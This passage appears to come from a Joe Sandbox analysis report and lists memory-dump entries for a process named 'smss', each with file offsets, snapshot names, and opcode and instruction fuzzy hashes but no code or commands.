                                                                                        • Opcode Fuzzy Hash: 131b69285f094bffb4f8d89de8781786193724ae5726677459608b5447f8b160
                                                                                        • Instruction Fuzzy Hash: 7D312E31A08A558FDBA9EF28C499E7477E1FB69314B0442ADD04EC7692DF28EC45CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c938d0bf01048b3d1fdb14cd7929123b73c484b0b83ee6ba5751589e04b1340c
                                                                                        • Instruction ID: 7b20aa9f4d958c25baf0780ce8df3f3387206e48b88c5ba8b0b9b6cde0ca4884
                                                                                        • Opcode Fuzzy Hash: c938d0bf01048b3d1fdb14cd7929123b73c484b0b83ee6ba5751589e04b1340c
                                                                                        • Instruction Fuzzy Hash: B821D83130CC184FE768EA1CE889EB977E1FB9936171501BAE58BC712ADD11EC8287C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888150000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6732519ef1e70c67af8d5a8deaff3f3d79fb0bd9f688448af5f92ab99b2ac2c9
                                                                                        • Instruction ID: 5924f6d2668036c79f9072724c08fe0ddaf5dc1808e9453d0fdf18e197089c5b
                                                                                        • Opcode Fuzzy Hash: 6732519ef1e70c67af8d5a8deaff3f3d79fb0bd9f688448af5f92ab99b2ac2c9
                                                                                        • Instruction Fuzzy Hash: E6318F31608A59CFDB99EF28C465EA5B7E1FB68310B04416ED40EC7692DE28E885CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1f33eb8adb61bf1a8c8a3765e96fd1d1e4fc47de644dd2163732ba2949738df0
                                                                                        • Instruction ID: 6504447e38496cdd186e5f7b6d0a15549f2824c8143c87ec4ad6f037abab1409
                                                                                        • Opcode Fuzzy Hash: 1f33eb8adb61bf1a8c8a3765e96fd1d1e4fc47de644dd2163732ba2949738df0
                                                                                        • Instruction Fuzzy Hash: 78314131A089598FDB59FF28C099EB9B7E1FB69310B044269D05EC7296DE38F845CF81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 74583db0dc093ace42baf0b3117dc16951373b782e44df41badf39b90d693560
                                                                                        • Instruction ID: 4930710ee2df1df3be4d07bb55591bfb99fa85eb1697608e4c3dc5024bded3e3
                                                                                        • Opcode Fuzzy Hash: 74583db0dc093ace42baf0b3117dc16951373b782e44df41badf39b90d693560
                                                                                        • Instruction Fuzzy Hash: 6A316231A0C9599FDB99EF28C455EB5B7E1FFA8310B0401AED44EC7692DE24E841CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0baa0c71709c9e7da7989cf86d142d558f647a3f9cbd3a902d8a87fd7b585b84
                                                                                        • Instruction ID: 2a0974013774a66f4342c3a458705413243ba35eb8ca1f02a507b42cfef40a50
                                                                                        • Opcode Fuzzy Hash: 0baa0c71709c9e7da7989cf86d142d558f647a3f9cbd3a902d8a87fd7b585b84
                                                                                        • Instruction Fuzzy Hash: 3F314131A0C9598FDB99FF2CC455EB4B7E1FB69710B0442A9D04ED7292DE28E845CB81
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7186237cf29faec2dbf6ec7aeb3a06b1fbcdf9fe4385d659bebb0bc9d94b967b
                                                                                        • Instruction ID: ec53413f6db9f20ee365e61f23a684d94231e29616f0bd3b918161b42a69c731
                                                                                        • Opcode Fuzzy Hash: 7186237cf29faec2dbf6ec7aeb3a06b1fbcdf9fe4385d659bebb0bc9d94b967b
                                                                                        • Instruction Fuzzy Hash: BE312720B189590FE788F66C944E77D77D2FF98291B0001BDE80FC72E7CE18A841C241
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 35527c2a14922cbe6861eea8a4fab233efe8cb0c82b487258b22399e3a969a68
                                                                                        • Instruction ID: 83c4d2c3f5ee72fa445231f3968e1546feeb2fb10d54e9edf4454ae2f14d0fa3
                                                                                        • Opcode Fuzzy Hash: 35527c2a14922cbe6861eea8a4fab233efe8cb0c82b487258b22399e3a969a68
                                                                                        • Instruction Fuzzy Hash: C831B430D4864A8FDB45EB64C8559BD7BF0FF5A350B0506BAC40ADB1A6DB38A841CB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f1a794bbb7b105fc688bf041661e7c03096f50933c9f73aa0c3f8270a632e92
                                                                                        • Instruction ID: 975730de0a0fb0d2364eb1b1c6dbad53448b95df718b07e119aa806f858b11d0
                                                                                        • Opcode Fuzzy Hash: 8f1a794bbb7b105fc688bf041661e7c03096f50933c9f73aa0c3f8270a632e92
                                                                                        • Instruction Fuzzy Hash: E931593992C94ACFEB9AEB5894555BD7BB1FF44380F50107AD44EC61A1DF387800DB45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a14349a992c7f3b0992023396baceb1e8a3dc530d5ff7f1d3a8d042d9cba833d
                                                                                        • Instruction ID: 3489064d13e3a6bec098f440f6cbdf670d0a943d24c87e7edfaa99f393c82618
                                                                                        • Opcode Fuzzy Hash: a14349a992c7f3b0992023396baceb1e8a3dc530d5ff7f1d3a8d042d9cba833d
                                                                                        • Instruction Fuzzy Hash: D9313734D1894ACFEBAADB5884556BD7FA0FF44B80F5001BAD48EE6181DF387940DB45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 34074af334eec79b59d41607e00d5b9aaf4e5f38ec85d333244ad9537e20a142
                                                                                        • Instruction ID: b2d62bc38fb7c3c27455fa21f20efb59e2708d42f0ce3508ade8b076d8339d70
                                                                                        • Opcode Fuzzy Hash: 34074af334eec79b59d41607e00d5b9aaf4e5f38ec85d333244ad9537e20a142
                                                                                        • Instruction Fuzzy Hash: C4313734D1C94ACFEBA8EB4884959BE7BB1FF58380F50017AD02ED6191DF396940DB45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888150000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888150000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0d28b30aae686c60e43460ba54e45ff2528fb5abf3ed86b369aff248dbe2fbdd
                                                                                        • Instruction ID: 1751e5eeaa041ae044719cbe8eb920f4d370ec49aec373638be964e653432236
                                                                                        • Opcode Fuzzy Hash: 0d28b30aae686c60e43460ba54e45ff2528fb5abf3ed86b369aff248dbe2fbdd
                                                                                        • Instruction Fuzzy Hash: 88312738D1894ACFEBAADB64C4956BDBBB1FF44380F5401BAD41ED6691CF38A840CB45
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8e185e4d7bd860a250eadb99eb4724255c351edfc53dfc13ee073a2963b3ae11
                                                                                        • Instruction ID: 1571f2980ab5e2e1ff8258f846c6c5e45b7fcc6d23b9c653fba694b2f3a4fbff
                                                                                        • Opcode Fuzzy Hash: 8e185e4d7bd860a250eadb99eb4724255c351edfc53dfc13ee073a2963b3ae11
                                                                                        • Instruction Fuzzy Hash: 1431265891C5E68AEB2BD21C54645747F91FF92240F2847BAD4CB8B0D7EE1CB842CB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f251098592260cc319d8340172ac52cbd8962498fbea1db666a735a417256a45
                                                                                        • Instruction ID: df6669149f51083e0e242c60daa7b06a85c7f8d0920e44999baaa6e448e1cae5
                                                                                        • Opcode Fuzzy Hash: f251098592260cc319d8340172ac52cbd8962498fbea1db666a735a417256a45
                                                                                        • Instruction Fuzzy Hash: 9B310638D0894ACFEBAAEB4884955BD7AA1FF54340F50017AD48ED2282DF397D50DB89
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0a39bfef5dd8cdac21568f76e0f350f006b586aa62431a767a1da389885f4bb4
                                                                                        • Instruction ID: f6731209afc0a72e3276b716bae0cc942fc5e12229027852513ea23a97982e1f
                                                                                        • Opcode Fuzzy Hash: 0a39bfef5dd8cdac21568f76e0f350f006b586aa62431a767a1da389885f4bb4
                                                                                        • Instruction Fuzzy Hash: 8C31491081C19A4AE33BD72844645B47F61FF62321B1886B6D0CA8B4CBEE1CB881C395
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 62b53bc416deb93c028f70a2a4928ea94a13c749c634e3aa8fc199bfa035c0f5
                                                                                        • Instruction ID: fc47081596fbf4de19b18f49742b689b626417bacff03a4977a7eefb92ecc653
                                                                                        • Opcode Fuzzy Hash: 62b53bc416deb93c028f70a2a4928ea94a13c749c634e3aa8fc199bfa035c0f5
                                                                                        • Instruction Fuzzy Hash: A131291493C5E6CAE32A932848785747F51FF52351F2887BAD497CB4C7DE1CA881C341
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5ce9f86b77cf4f1c5501d7777b167af41baed1afe28eb267a68a94909596692f
                                                                                        • Instruction ID: fcc137146ae3a2957a633aef98900886af7693c9c944c161afe5ed5c45ee6a38
                                                                                        • Opcode Fuzzy Hash: 5ce9f86b77cf4f1c5501d7777b167af41baed1afe28eb267a68a94909596692f
                                                                                        • Instruction Fuzzy Hash: 97210A36E0C6998AE712A77898011EC7B70FF423A5F1543B7D0298B1C6DA382546C791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5f59ca21ed05d621d76c8d294cf2151c6ac8b7369433251e0d3b06d1b49e5a55
                                                                                        • Instruction ID: 2fc238ca23b847a44c4111f7c9a949a6ccaa3172cf93524cbb1b9bee161e86be
                                                                                        • Opcode Fuzzy Hash: 5f59ca21ed05d621d76c8d294cf2151c6ac8b7369433251e0d3b06d1b49e5a55
                                                                                        • Instruction Fuzzy Hash: 2E215434D1895E9FCB99EB68D854AEDBBB2FF98340F10017AD00AE3281DF386841CB54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cea36555148b5a318883a63a711d59ce87b3f0039591360196119b308b5ce177
                                                                                        • Instruction ID: c317e6e14c8825cac0d2ad8e9f2a82d4734edd8675e2fcf57f5ff1b58d016535
                                                                                        • Opcode Fuzzy Hash: cea36555148b5a318883a63a711d59ce87b3f0039591360196119b308b5ce177
                                                                                        • Instruction Fuzzy Hash: 32216A34D18A4D9FDB95DB98C990AEDBBB1FF98340F10017AD04AE3292DE24B805CB55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6bb65a17358ab90688e3aaee6b3906160c6580ac47a66b772df74bf1b8067a8
                                                                                        • Instruction ID: 67e212909aba97cbf3db1b411e2966c1410fbb636c2da3d9d558adb240e0d0f5
                                                                                        • Opcode Fuzzy Hash: f6bb65a17358ab90688e3aaee6b3906160c6580ac47a66b772df74bf1b8067a8
                                                                                        • Instruction Fuzzy Hash: D5213D1091C46A8EE63AD71880645F43B61FF60351F14C679D1CB8B48BFE2CB881C399
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 361e38bfcc751ef9bbf2b0e15e1778398874264d6cf2136f417378822501147d
                                                                                        • Instruction ID: a34dbf77168cac28aa5198612f2d507765aa6e75dd344af3b067779f82ede140
                                                                                        • Opcode Fuzzy Hash: 361e38bfcc751ef9bbf2b0e15e1778398874264d6cf2136f417378822501147d
                                                                                        • Instruction Fuzzy Hash: 7E211635E2895E9FDB95EB98C8909ADBFB1FF58340F11012AD04AE3282DF286845CB55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 94c1c7d79728b06f7c33c516a649a4b08c3ec38ac1ade6a1d1cf1bebded2b03d
                                                                                        • Instruction ID: 786ca4eb7f7ab3f5c8473b1d23b544808a7b04f1904784eedb99ed471ea721ef
                                                                                        • Opcode Fuzzy Hash: 94c1c7d79728b06f7c33c516a649a4b08c3ec38ac1ade6a1d1cf1bebded2b03d
                                                                                        • Instruction Fuzzy Hash: 2D21D499D8D2D28BF336826458A49B87E50BF423A0F1801BAD08E4A0C3CE6C16C6D796
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D91000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D91000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d91000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: defe259e772d32c1d8908ee644271ff9490c835617f7f19254818cf025f2ee6a
                                                                                        • Instruction ID: 8b4ff59a61963364322720b2b2c117267d3beccc41ceaf12aee4164cc3756de8
                                                                                        • Opcode Fuzzy Hash: defe259e772d32c1d8908ee644271ff9490c835617f7f19254818cf025f2ee6a
                                                                                        • Instruction Fuzzy Hash: 1721676184F3C2AFD74397794C256A5BFB0AE57150B4D42EBD0D9CB0E3DA4D289AC322
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 94e9878199942ae9aa0cf54da5be2e10560138d05e04e14b753ced0067294def
                                                                                        • Instruction ID: ff058006b0576c0e3ff794a12389a97232bc1c3d0c7e29b76273a8e274140625
                                                                                        • Opcode Fuzzy Hash: 94e9878199942ae9aa0cf54da5be2e10560138d05e04e14b753ced0067294def
                                                                                        • Instruction Fuzzy Hash: 81112266E0D78A4FE766A66888152FABFE5FF46390F0401BED049CB1C6DF582807C355
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: da792f3442a8aa91863233e042107f422d506de0a2225823ef63960c9ac346c6
                                                                                        • Instruction ID: 2a846eb78fa8f534441774374f80327c099f30865a8a16350f9453353365c055
                                                                                        • Opcode Fuzzy Hash: da792f3442a8aa91863233e042107f422d506de0a2225823ef63960c9ac346c6
                                                                                        • Instruction Fuzzy Hash: 4E113A75A0D68A9FE362D67488485F93FE5FF46390F05017AD08ECB192DE5C3846C395
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7520c492b8e3287e3fb5a9ae43437a67e872e6a2adc74f7e5d562e91c525361c
                                                                                        • Instruction ID: 12cf396941643a51b89f1048048220ee033cb732e2a623b41310fd25a479e3a0
                                                                                        • Opcode Fuzzy Hash: 7520c492b8e3287e3fb5a9ae43437a67e872e6a2adc74f7e5d562e91c525361c
                                                                                        • Instruction Fuzzy Hash: 2401F732B4DA2D0B5668D51D988A939B3D1EBCAAB07191379D88FC325ADD10BC5382C0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2ff4fd2c793f0269cd560303f8faa85db5f5e805ce70cc2eaacbaccd1b0f486e
                                                                                        • Instruction ID: 6b0379b1de47e51e86c724cce03d00ee0efef52066b991f6693da739cd28924a
                                                                                        • Opcode Fuzzy Hash: 2ff4fd2c793f0269cd560303f8faa85db5f5e805ce70cc2eaacbaccd1b0f486e
                                                                                        • Instruction Fuzzy Hash: 2311E75892C47686FE69D60C90645B47B91FF90341F344775D8CF8B48AEE2CB881DB85
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 92dce96681038a638abb354b60866b29a870941b6691490a191c867db2edacc8
                                                                                        • Instruction ID: 836f2baf35d9d0b500fc20466e0a6337baf9c76371af33f72c8a7fb105006cf3
                                                                                        • Opcode Fuzzy Hash: 92dce96681038a638abb354b60866b29a870941b6691490a191c867db2edacc8
                                                                                        • Instruction Fuzzy Hash: E811E41493C866C6E67C921884785B57A91FFA0351F248779D46BCB4CADE2CB981C784
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bd7bad444003f72e6724f4085f2c6dae27a6f7519c8952a2567f1c119d7e494b
                                                                                        • Instruction ID: 2d5de368ffbe76b4032f4d0b81ec8c605487f08a76b83774a4aac8f49a655338
                                                                                        • Opcode Fuzzy Hash: bd7bad444003f72e6724f4085f2c6dae27a6f7519c8952a2567f1c119d7e494b
                                                                                        • Instruction Fuzzy Hash: 3111E030A08A494FCB95EF65D451AFA7BE2FF45390F40067AD44EC70E2DF68A949C780
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 47eb178ca5b0424889d2685a439fefcf5e563dd7076888f79dccc48ba3a2401f
                                                                                        • Instruction ID: 7fb322e72bf6e7905f19f08838395464f9a7c99892365736fc17ced47f06579f
                                                                                        • Opcode Fuzzy Hash: 47eb178ca5b0424889d2685a439fefcf5e563dd7076888f79dccc48ba3a2401f
                                                                                        • Instruction Fuzzy Hash: AA11EF20648A494FCB95EB35D450AFA7BE2FF84290F50067AD48FC7093DF28B516C381
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF88815C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF88815C000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff88815c000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5c60682e6b1917645a9afa59e6d0db325837bf8e74ebbc77bf2106627a59fdb4
                                                                                        • Instruction ID: fd263672be98391f953c8dc3ffcb3d7d652ae877a76cadc05d990409e640f668
                                                                                        • Opcode Fuzzy Hash: 5c60682e6b1917645a9afa59e6d0db325837bf8e74ebbc77bf2106627a59fdb4
                                                                                        • Instruction Fuzzy Hash: 7911F334A189198EDB98EB58D465ABDBBA1FF68311F0001BA900EE3291CF396980CB41
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888154000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888154000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888154000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8fc14ef57d70663d4b11426c6ec46652bebcfbb11f66a81fc6f85b0ada3cdf8f
                                                                                        • Instruction ID: 7efcbc1147cb126358795318dc76135ebb590d85389f415cfe0a72f7844a7d3b
                                                                                        • Opcode Fuzzy Hash: 8fc14ef57d70663d4b11426c6ec46652bebcfbb11f66a81fc6f85b0ada3cdf8f
                                                                                        • Instruction Fuzzy Hash: B211063580E7869FD76196A488555E93FA1FF83350F0401BAD04DCB282CE683845C791
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2367994017.00007FF887D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff887d70000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2614c5e46df2ff28b199e1e66f241d41951da61b43cfc65732012a0ba005c4b3
                                                                                        • Instruction ID: 8fef2aa3cab0a3eff12db09006569c7b56627314d083e029fe1aee9293618854
                                                                                        • Opcode Fuzzy Hash: 2614c5e46df2ff28b199e1e66f241d41951da61b43cfc65732012a0ba005c4b3
                                                                                        • Instruction Fuzzy Hash: 31217F30E48A2D8FDB94DB04C851BACB3B1FB54355F5041A9C44FE7295CE39AD84CB82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 89f2911b8a9ce31c5725e46d8fdfca70294d4d9a4f22236676f78f4834baa38c
                                                                                        • Instruction ID: 5170f49e79afa5dd7c1971c418804169841cab2cb0199a61b06d4a6438a4e538
                                                                                        • Opcode Fuzzy Hash: 89f2911b8a9ce31c5725e46d8fdfca70294d4d9a4f22236676f78f4834baa38c
                                                                                        • Instruction Fuzzy Hash: 0611A63124964A4FD706CE28D8547E63B92FF41364F1002BED94ACB1D2DBA9A960C780
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000032.00000002.2543660952.00007FF888165000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888165000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_50_2_7ff888165000_smss.jbxd
